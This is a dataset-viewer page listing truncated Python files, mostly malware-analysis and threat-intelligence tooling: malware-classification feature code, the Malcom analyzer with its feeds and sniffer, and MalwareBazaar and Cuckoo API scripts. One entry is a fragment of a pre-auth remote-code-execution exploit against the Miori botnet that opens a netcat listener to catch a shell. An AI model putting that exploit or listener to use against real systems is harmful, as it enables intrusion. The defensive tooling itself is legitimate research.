text stringlengths 0 9.3M |
|---|
import os
import subprocess
train={}
test={}
path='..'
f=open(path+'/trainLabels.csv')
fo=open('trainLabels.csv','w')
fo.write(f.readline())
f1=open(path+'/sampleSubmission.csv')
fo1=open('sampleSubmission.csv','w')
fo1.write(f1.readline())
for line in f:
xx=line.split(',')
label=int(xx[-1])
if label not i... |
import subprocess
data_path='.'
opcode_path='op_train'
jump_path='jump_train'
jump_map_path='jump_map_train'
cmd='mkdir '+' '.join([opcode_path,jump_path,jump_map_path])
subprocess.call(cmd,shell=True)
cmd='pypy get_ins.py xid_train.p '+' '.join([data_path+'/train',opcode_path])
subprocess.call(cmd,shell=True)
cmd='... |
from sklearn.ensemble import RandomForestClassifier
import pickle
import sys
import numpy as np
X1=np.array(pickle.load(open('X2g_train.p')))
X2=np.array(pickle.load(open('X3g_train.p')))
X3=np.array(pickle.load(open('X4g_train.p')))
X4=np.array(pickle.load(open('Xhead_train.p')))
X=np.hstack((X2,X1,X3,X4))
y=np.arra... |
import os
xid=[i.split('.')[0] for i in os.listdir('train') if '.asm' in i]
Xt_id=[i.split('.')[0] for i in os.listdir('test') if '.asm' in i]
f=open('trainLabels.csv')
f.readline()
label={}
for line in f:
xx=line.split(',')
idx=xx[0][1:-1]
label[idx]=int(xx[-1])
f.close()
y=[label[i] for i in xid]
import p... |
import pickle
import sys
##########################################################
# usage
# pypy getins.py xid_train.p ../../data/train ./ins_train ./jump_train
# xid_train.p is a list like ['loIP1tiwELF9YNZQjSUO',''....] to specify
# the order of samples in traing data
# ../../data/train is the path of original tra... |
import pickle
import sys
xid=pickle.load(open(sys.argv[1]))
#unconditional_jump=['jmp','j','ja']
ins_path=sys.argv[2]
jump_path=sys.argv[3]
for cc,i in enumerate(xid):
jmp={}
tmp=pickle.load(open(ins_path+'/'+i+'.ins.p'))
for add in tmp:
if tmp[add] == 'jmp' or tmp[add]=='ja':
jmp[add]... |
import pickle
import sys
##########################################################
# usage
# pypy get_jump_map.py xid_train.p ../../data/train ./jump_train ./jump_map_train
# xid_train.p is a list like ['loIP1tiwELF9YNZQjSUO',''....] to specify
# the order of samples in traing data
# ../../data/train is the path of ... |
import numpy,scipy.misc, os, array
def get_feature(data_set = 'train', data_type = 'bytes'):
files=os.listdir(data_set)
with open('%s_%s_image.csv'%(data_set, data_type),'wb') as f:
f.write('Id,%s\n'%','.join(['%s_%i'%(data_type,x)for x in xrange(1000)]))
for cc,x in enumerate(files):
... |
# -*- coding: utf-8 -*-
## instructions frequency
from multiprocessing import Pool
import os
import csv
paths = ['train','test']
instr_set = set(['mov','xchg','stc','clc','cmc','std','cld','sti','cli','push',
'pushf','pusha','pop','popf','popa','cbw','cwd','cwde','in','out',
'add','adc','sub','sbb','div','idiv','m... |
import heapq
import pickle
import math
from csv import DictReader
import glob
import os
import csv
def join_ngrams(num = 100000):
dict_all = dict()
for c in range(1,10):
#print "merging %i out of 9"%c
heap = pickle.load(open('gram/ngram_%i_top%i'%(c,num),'rb'))
while heap:
c... |
from sklearn.ensemble import RandomForestClassifier as RF
from sklearn.linear_model import LogisticRegression as LGR
from sklearn.ensemble import GradientBoostingClassifier as GBC
from sklearn.ensemble import ExtraTreesClassifier as ET
from xgboost_multi import XGBC
from sklearn import cross_validation
from sklearn.cro... |
from sklearn.ensemble import RandomForestClassifier as RF
from sklearn.linear_model import LogisticRegression as LGR
from sklearn.ensemble import GradientBoostingClassifier as GBC
from sklearn.ensemble import ExtraTreesClassifier as ET
from xgboost_multi import XGBC
from sklearn import cross_validation
from sklearn.cro... |
from sklearn.ensemble import RandomForestClassifier as RF
from sklearn.linear_model import LogisticRegression as LGR
from sklearn.ensemble import GradientBoostingClassifier as GBC
from sklearn.ensemble import ExtraTreesClassifier as ET
from xgboost_multi import XGBC
from sklearn import cross_validation
from sklearn.cro... |
import sys
import pickle
##########################################################
# usage
# pypy rebuild_2g.py xid_train.p ../../data/train
# xid_train.p is a list like ['loIP1tiwELF9YNZQjSUO',''....] to specify
# the order of samples in traing data
# ../../data/train is the path of original train data
###########... |
import os,array
import pickle
import numpy as np
import sys
xid=pickle.load(open(sys.argv[1]))
asm_code_path=sys.argv[2]
train_or_test=asm_code_path.split('_')[-1]
X = np.zeros((len(xid),2000))
for cc,i in enumerate(xid):
f=open(asm_code_path+'/'+i+'.asm')
ln = os.path.getsize(asm_code_path+'/'+i+'.asm') # len... |
from sklearn.ensemble import RandomForestClassifier as RF
from sklearn.linear_model import LogisticRegression as LGR
from sklearn.ensemble import GradientBoostingClassifier as GBC
from sklearn.ensemble import ExtraTreesClassifier as ET
from xgboost_multi import XGBC
from sklearn import cross_validation
from sklearn.cro... |
from sklearn.ensemble import RandomForestClassifier as RF
from xgboost_multi import XGBC
from sklearn import cross_validation
from sklearn.cross_validation import StratifiedKFold as KFold
from sklearn.metrics import log_loss
import numpy as np
import pandas as pd
import pickle
# create model_list
def get_model_list()... |
from csv import DictReader
from datetime import datetime
import pickle
import heapq
import sys
# load data
def load_label(path, label):
result = []
for row in DictReader(open(path)):
if int(row['Class']) == label:
result.append((row['Id']))
return result
# generate grams dictionary fo... |
import pickle
import sys
xid=pickle.load(open(sys.argv[1]))
data_path=sys.argv[2]
asm_code_path=sys.argv[3]
for cc,i in enumerate(xid):
f=open(data_path+'/'+i+'.asm')
fo=open(asm_code_path+'/'+i+'.asm','w')
start=True
for line in f:
xx=line.split()
for c,x in enumerate(xx):
... |
import inspect
import os
import sys
code_path = os.path.join(
os.path.split(inspect.getfile(inspect.currentframe()))[0], "xgboost-master/wrapper")
sys.path.append(code_path)
import xgboost as xgb
import numpy as np
class XGBC(object):
def __init__(self, num_round = 2, max_depth = 2, eta= 1.0, min_child_weight = 2... |
__author__ = 'pyt'
import sys
import os
from datetime import timedelta
sys.path.insert(0, os.getcwd())
CELERY_SEND_EVENTS = True
CELERY_TASK_PUBLISH_RETRY = True
BROKER_HEARTBEAT = 30
BROKER_CONNECTION_RETRY = True
BROKER_CONNECTION_MAX_RETRIES = 100
BROKER_CONNECTION_TIMEOUT = 4
CELERY_CREATE_MISSING_QUEUES = True
... |
from analytics import Analytics
from toolbox import debug_output
a = Analytics()
# Check if there are elements which have no created date
nocreate = a.data.find({"date_created": None}).count()
type = "error" if nocreate > 0 else "debug"
debug_output("Elements without a date_created: {}".format(nocreate), type)
# Che... |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__description__ = 'Malcom - Malware communications analyzer'
__author__ = '@tomchop_'
__version__ = '1.3 alpha'
__license__ = "GPL"
import os, sys, argparse
import netifaces as ni
from Malcom.config.malconf import MalcomSetup
from Malcom.auxiliary.toolbox import debug_ou... |
from Malcom.feeds.core import FeedEngine
import os
all_feeds = [
"AsproxTracker",
"CybercrimeTracker",
"FeodoTracker",
"MalcodeBinaries",
"MalwaredRu",
"MalwareTrafficAnalysis",
"MalwareDomainList",
"PalevoTracker",
"TorExitNodes",
"ZeusTrackerBinaries",
"ZeusTrackerConfigs",
"ZeusT... |
__author__ = 'pyt'
from celery import Celery
from celery.utils.log import get_task_logger
celery = Celery()
celery.config_from_object('celeryconfig')
logger = get_task_logger(__name__)
|
app = None
feed_engine = None
analytics_engine = None
sniffer_sessions = {}
config = {}
|
import time
import threading
import pickle
import datetime
import os
from multiprocessing import Process # JoinableQueue as Queue, Lock
import traceback
import Queue as Queue
from threading import Thread, Lock
from Malcom.auxiliary.toolbox import *
from Malcom.model.model import Model
from Malcom.model.datatypes impo... |
import json, threading, time, sys
from Malcom.shmem.SharedData import Messenger
from Malcom.auxiliary.toolbox import debug_output
class AnalyticsMessenger(Messenger):
"""docstring for AnalyticsMessenger"""
def __init__(self, analytics_instance):
super(AnalyticsMessenger, self).__init__()
self.name = 'analytics... |
import socket, sys
import inspect
import urlparse
import re
import urllib2
import socket
import json
import datetime
import string
#from pyquery import PyQuery # external
#from lxml import etree
from dateutil.parser import parse
import logging
from subprocess import check_output, CalledProcessError, STDOU... |
import ConfigParser
import os
import netifaces as ni
class MalcomSetup(dict):
"""Configuraiton loader"""
def __init__(self):
super(MalcomSetup, self).__init__()
def save_config():
raise NotImplemented
def load_config(self, args):
self.parse_command_line(args)
self.san... |
import os
import time
import threading
import csv
import imp
from StringIO import StringIO
from datetime import timedelta, datetime
from multiprocessing import Process
from lxml import etree
import requests
from Malcom.auxiliary.toolbox import debug_output
from Malcom.model.model import Model
from Malcom.feeds.core... |
import urllib2
from bson.json_util import dumps, loads
from Malcom.model.datatypes import Ip, Url, Hostname, As
from Malcom.feeds.core import Feed
class MalcomBaseFeed(Feed):
"""
This gets data from other Malcom Instances
"""
def __init__(self):
super(MalcomBaseFeed, self).__init__(run_every="... |
import json
from bson import json_util
from Malcom.auxiliary.toolbox import debug_output
from Malcom.shmem.SharedData import Messenger
class FeedsMessenger(Messenger):
"""REDIS messenger for FeedEngine"""
def __init__(self, feedengine_instance):
super(FeedsMessenger, self).__init__()
self.na... |
from Malcom.feeds.core.feed import FeedEngine, Feed
# from Malcom.feeds.core.feed import Feed |
import codecs
from Malcom.feeds.core import Feed
class ExportAll(Feed):
"""
This exports data from the db every 1h
"""
def __init__(self):
super(ExportAll, self).__init__(run_every="1h")
self.description = "Export all the dataset to CSV and JSON"
self.source = "local"
s... |
import md5
import datetime
import csv
import requests
import zipfile
from StringIO import StringIO
from Malcom.model.datatypes import Url
from Malcom.feeds.core import Feed
class Alexa(Feed):
"""
This is a feed that will fetch data from a Alexa's top 1M
"""
def __init__(self):
super(Alexa, se... |
import md5
import urllib2
import datetime
import csv
from Malcom.model.datatypes import Url
from Malcom.feeds.core import Feed
class AsproxTracker(Feed):
"""
This is a feed that will fetch data from a URL and process it
"""
def __init__(self):
super(AsproxTracker, self).__init__(run_every="12... |
import datetime
import md5
from Malcom.model.datatypes import Url
from Malcom.feeds.core import Feed
import Malcom.auxiliary.toolbox as toolbox
class CybercrimeTracker(Feed):
def __init__(self):
super(CybercrimeTracker, self).__init__(run_every="12h")
self.description = "CyberCrime Tracker - Lat... |
import datetime
import re
import md5
import Malcom.auxiliary.toolbox as toolbox
from Malcom.model.datatypes import Ip, Hostname
from Malcom.feeds.core import Feed
class FeodoTracker(Feed):
descriptions = {
'A': "Hosted on compromised webservers running an nginx proxy on port 8080 TCP forwarding ... |
import md5
import re
import sys
from Malcom.feeds.core import Feed
from Malcom.model.datatypes import Url
class MalcodeBinaries(Feed):
def __init__(self):
super(MalcodeBinaries, self).__init__(run_every="1h")
self.description = "Updated Feed of Malicious Executables"
self.source = "http:... |
import urllib2
import datetime
import md5
from Malcom.model.datatypes import Url
from Malcom.feeds.core import Feed
from bs4 import BeautifulSoup
class MalwaredRu(Feed):
def __init__(self):
super(MalwaredRu, self).__init__(run_every="1h")
self.source = "http://malwared.malwaremustdie.org/rss.p... |
from Malcom.model.datatypes import Hostname
from Malcom.feeds.core import Feed
import Malcom.auxiliary.toolbox as toolbox
import datetime
import md5
class MalwareDomainsDotCom(Feed):
"""
This is a feed that will fetch data from a URL and process it
"""
def __init__(self):
super(MalwareDomains... |
import re
import md5
from Malcom.model.datatypes import Url
from Malcom.feeds.core import Feed
class MalwareDomainList(Feed):
"""
This gets data from http://www.malwaredomainlist.com/hostslist/mdl.xml
"""
def __init__(self):
super(MalwareDomainList, self).__init__(run_every="12h")
sel... |
import urllib2
import re
import datetime
import md5
from Malcom.model.datatypes import Ip, Hostname
from Malcom.feeds.core import Feed
import Malcom.auxiliary.toolbox as toolbox
class MalwareTrafficAnalysis(Feed):
"""
This is a feed that will fetch data from a URL and process it
"""
def __init__(self... |
import re
import md5
from Malcom.feeds.core import Feed
from Malcom.model.datatypes import Hostname
import Malcom.auxiliary.toolbox as toolbox
class PalevoTracker(Feed):
"""
This gets data from https://palevotracker.abuse.ch/?rssfeed
"""
def __init__(self):
super(PalevoTracker, self).__init__... |
import urllib2
import md5
from Malcom.feeds.core import Feed
import Malcom.auxiliary.toolbox as toolbox
from Malcom.model.datatypes import Ip
class TorExitNodes(Feed):
"""
This gets data from https://www.dan.me.uk/tornodes
"""
def __init__(self):
super(TorExitNodes, self).__init__(run_every="... |
import datetime
import re
import md5
from Malcom.model.datatypes import Url
from Malcom.feeds.core import Feed
class ZeusTrackerBinaries(Feed):
def __init__(self):
super(ZeusTrackerBinaries, self).__init__()
self.source = "https://zeustracker.abuse.ch/monitor.php?urlfeed=binaries"
self.d... |
import datetime
import re
import md5
from Malcom.model.datatypes import Url
from Malcom.feeds.core import Feed
class ZeusTrackerConfigs(Feed):
def __init__(self):
super(ZeusTrackerConfigs, self).__init__(run_every="1h")
self.source = "https://zeustracker.abuse.ch/monitor.php?urlfeed=configs"
... |
import datetime
import re
import md5
from Malcom.model.datatypes import Url
from Malcom.feeds.core import Feed
class ZeusTrackerDropzones(Feed):
def __init__(self):
super(ZeusTrackerDropzones, self).__init__(run_every="1h")
self.source = "https://zeustracker.abuse.ch/monitor.php?urlfeed=dropzone... |
import datetime
import os
import sys
from bson.json_util import dumps, loads
from Malcom.auxiliary.toolbox import debug_output
import Malcom.auxiliary.toolbox as toolbox
try:
import geoip2.database
file = os.path.abspath(__file__)
current_path = os.path.dirname(os.path.abspath(__file__))
path = os.pat... |
# from gevent import monkey; monkey.patch_socket()#subprocess()#socket(dns=False); monkey.patch_time();
import dateutil
import threading
import os
import pickle
import pymongo
from pymongo import MongoClient
from pymongo.son_manipulator import SONManipulator
from pymongo.read_preferences import ReadPreference
import ... |
import dateutil
import threading
import os
import string
import random
import re
import datetime
from pymongo import MongoClient
from pymongo.son_manipulator import SONManipulator
from pymongo.read_preferences import ReadPreference
import pymongo.errors
from passlib.hash import pbkdf2_sha512
from flask.ext.login impor... |
from bson import json_util
import redis, threading, time, json, sys
import random
from Malcom.auxiliary.toolbox import debug_output
# analytics
class Messenger(object):
"""docstring for RedisSubscriber"""
def __init__(self):
pass
# super(Messenger, self).__init__()
self.r = redis.StrictRedis(host='localhost',... |
from scapy.all import *
from scapy.error import Scapy_Exception
import pwd, os, sys, time, threading, string
from bson.json_util import dumps, loads
from bson import Binary
from Malcom.model.datatypes import Url, Hostname, Ip
import Malcom.auxiliary.toolbox as toolbox
rr_codes = {1: "A", 28: "AAAA", 2: "NS", 5: "CNAM... |
import json, threading, time, sys
from bson import json_util
from bson.json_util import loads as bson_loads
from bson.json_util import dumps as bson_dumps
from Malcom.shmem.SharedData import Messenger
from Malcom.auxiliary.toolbox import debug_output
class SnifferMessenger(Messenger):
"""docstring for SnifferMesseng... |
import os
import sys
import time
import threading
import datetime
import imp
from scapy.all import *
from bson.json_util import dumps as bson_dumps
from bson.json_util import loads as bson_loads
from bson.objectid import ObjectId
from Malcom.sniffer.flow import Flow
from Malcom.auxiliary.toolbox import debug_output
f... |
from ConfigParser import ConfigParser
import os
import re
import datetime
class Module(object):
"""docstring for Module"""
def __init__(self):
self.timeout = 24
self.load_conf()
def add_static_tags(self, content):
add = ""
static_dir = os.path.join(os.path.dirname(os.path.r... |
from scapy.all import *
from Malcom.sniffer.modules.base_module import Module
from Malcom.auxiliary.toolbox import debug_output
classname = "PassiveDns"
# This is a dummy module to give an example of what modules can be used for
# PassiveDns is a very basic module that will go through all the packets
# in a capture ... |
'''
Created on 13 mai 2015
@author: slarinier
Thanks to inliniac and Regit for ideas:
https://github.com/inliniac/suricata/blob/master/scripts/suricatasc/src/suricatasc.py
'''
import glob
import multiprocessing
import os
from socket import socket, AF_UNIX, error
from subprocess import PIPE
import subprocess
from ti... |
import os
from scapy.all import *
from bson.json_util import dumps as bson_dumps
from bson.json_util import loads as bson_loads
import yara
from Malcom.sniffer.modules.base_module import Module
from Malcom.auxiliary.toolbox import debug_output
classname = "YaraScan"
class YaraScan(Module):
"""Iterates over eac... |
#!/usr/bin/env python
# coding: utf-8
# inspired from http://musta.sh/2012-03-04/twisted-tcp-proxy.html
import sys, threading
from time import sleep
from collections import deque
from twisted.internet import defer, ssl
from twisted.internet import protocol
from twisted.internet import reactor
class ProxyClientPro... |
__author__ = 'pyt'
from Malcom.analytics.analytics import Analytics
from Malcom.celeryctl import celery
from Malcom.feeds.mdlhostlist import MDLHosts
from Malcom.feeds.mdliplist import MDLIpList
from Malcom.feeds.mdltracker import MDLTracker
@celery.task
def mdlhosts_tasks():
mdl = MDLHosts("MDLHosts")
mdl.a... |
__author__ = 'pyt'
from Malcom.feeds.alienvault import AlienvaultIP
from Malcom.feeds.dshield_as16276 import DShield16276
from Malcom.feeds.dshield_as3215 import DShield3215
from Malcom.feeds.malcode import MalcodeBinaries
from Malcom.feeds.malwarepatrol import MalwarePatrolVX
from Malcom.feeds.openbl import OpenblIP
... |
__author__ = 'pyt'
from Malcom.tasks.zeus import (zeustrackerbinaries_tasks,
zeustrackerconfigs_tasks,
zeustrackergameoverdomains_tasks,
zeustrackerdropzones_tasks
)
from Malcom.tasks.spyeye impo... |
__author__ = 'pyt'
from Malcom.analytics.analytics import Analytics
from Malcom.celeryctl import celery
from Malcom.feeds.spyeyebinaries import SpyEyeBinaries
from Malcom.feeds.spyeyeconfigs import SpyEyeConfigs
from Malcom.feeds.spyeyedropzones import SpyEyeDropzones
from Malcom.feeds.spyeyecnc import SpyEyeCnc
@ce... |
__author__ = 'pyt'
from Malcom.analytics.analytics import Analytics
from Malcom.celeryctl import celery
from Malcom.feeds.zeustracker import ZeusTrackerBinaries
from Malcom.feeds.zeusgameover import ZeusGameOverDomains
from Malcom.feeds.zeusdropzones import ZeusTrackerDropzones
from Malcom.feeds.zeusconfigs import Zeu... |
__author__ = 'pyt'
|
from bson.json_util import dumps, loads
from bson.objectid import ObjectId
from bson.objectid import InvalidId
from flask import Blueprint, render_template, abort, request, g, url_for, send_from_directory
from flask.helpers import make_response
from flask_restful import Resource, reqparse, Api, abort as restful_abort
i... |
from Malcom.shmem.SharedData import Messenger
from Malcom.auxiliary.toolbox import send_msg, debug_output
import json, time, redis, sys
class WebMessenger(Messenger):
def __init__(self):
super(WebMessenger, self).__init__()
self.name = 'web'
debug_output("[+] WebMessenger started")
self.subscribe_channel('... |
#!/usr/bin/python
# -*- coding: utf-8 -*-
__description__ = 'Malcom - Malware communications analyzer'
__author__ = '@tomchop_'
__version__ = '1.3 alpha'
__license__ = "GPL"
# patch threads
from gevent import monkey; monkey.patch_socket(dns=False);
# system
import os, datetime, time, sys, signal, argparse, re, pickl... |
from flask import Blueprint, render_template, abort, request, g
import gevent
from bson.objectid import ObjectId
from bson.json_util import dumps, loads
from Malcom.web.webserver import login_required
from Malcom.auxiliary.toolbox import *
malcom_websockets = Blueprint('malcom_websockets', __name__)
# APIs (web... |
# Exploit for Miori v1.3
# Pre-Auth RCE
# Discovery: 27.08.2019
# Written by @v3ded
# Not to be used for malicious purposes. @v3ded doesn't condone malicious behaviour.
import socket
import os
import sys
import threading
from time import sleep
def Listen(port):
os.system("nc -nlvp {}".format(port))
if(len(sys.arg... |
#!/usr/bin/env python3
import requests
import json
import argparse
__author__ = "Corsin Camichel"
__copyright__ = "Copyright 2020, Corsin Camichel"
__license__ = "Creative Commons Attribution-ShareAlike 4.0 International License."
__version__ = "1.0"
__email__ = "cocaman@gmail.com"
parser = argparse.ArgumentParser(de... |
#!/usr/bin/env python3
import requests
import sys
import argparse
import json
import pyzipper
__author__ = "Corsin Camichel"
__copyright__ = "Copyright 2020, Corsin Camichel"
__license__ = "Creative Commons Attribution-ShareAlike 4.0 International License."
__version__ = "1.0"
__email__ = "cocaman@gmail.com"
def chec... |
#!/usr/bin/env python3
import requests
import json
import os
from jq import jq
__author__ = "Corsin Camichel"
__copyright__ = "Copyright 2020, Corsin Camichel"
__license__ = "Creative Commons Attribution-ShareAlike 4.0 International License."
__version__ = "1.0"
__email__ = "cocaman@gmail.com"
JQ_QUERY = ".data[].sha... |
#!/usr/bin/env python3
import requests
import json
import os
from jq import jq
__author__ = "Corsin Camichel"
__copyright__ = "Copyright 2020, Corsin Camichel"
__license__ = "Creative Commons Attribution-ShareAlike 4.0 International License."
__version__ = "1.0"
__email__ = "cocaman@gmail.com"
JQ_QUERY = ".data[].sha... |
#!/usr/bin/env python3
import requests
import sys
import argparse
import json
from jq import jq
__author__ = "Corsin Camichel"
__copyright__ = "Copyright 2020, Corsin Camichel"
__license__ = "Creative Commons Attribution-ShareAlike 4.0 International License."
__version__ = "1.0"
__email__ = "cocaman@gmail.com"
parse... |
#!/usr/bin/env python3
import requests
import json
import argparse
from jq import jq
__author__ = "Corsin Camichel"
__copyright__ = "Copyright 2020, Corsin Camichel"
__license__ = "Creative Commons Attribution-ShareAlike 4.0 International License."
__version__ = "1.0"
__email__ = "cocaman@gmail.com"
parser = argparse... |
#!/usr/bin/env python3
import requests
import json
import sys
import argparse
__author__ = "Corsin Camichel"
__copyright__ = "Copyright 2020, Corsin Camichel"
__license__ = "Creative Commons Attribution-ShareAlike 4.0 International License."
__version__ = "1.0"
__email__ = "cocaman@gmail.com"
parser = argparse.Argume... |
#!/usr/bin/env python3
import requests
import sys
import argparse
import json
import hashlib
import os
__author__ = "Corsin Camichel"
__copyright__ = "Copyright 2020, Corsin Camichel"
__license__ = "Creative Commons Attribution-ShareAlike 4.0 International License."
__version__ = "1.1"
__email__ = "cocaman@gmail.com"
... |
#!/usr/bin/env python3
import requests
import sys
import argparse
import json
import hashlib
import os
__author__ = "Corsin Camichel"
__copyright__ = "Copyright 2020, Corsin Camichel"
__license__ = "Creative Commons Attribution-ShareAlike 4.0 International License."
__version__ = "1.0.0"
__email__ = "cocaman@gmail.com... |
import requests
import json
import pyzipper
import hashlib
import os
class Bazaar:
"""Malware Bazaar class wrapper for methods and shared values
Args:
url (str, optional): URL of malware bazaar. Defaults to 'https://mb-api.abuse.ch/api/v1/'.
api_key (str, optional): API Key to send requests wi... |
import CuckooAPI
api = CuckooAPI.CuckooAPI("10.0.0.144", APIPY=True, port=8090)
api.submitfile("malware.exe") |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.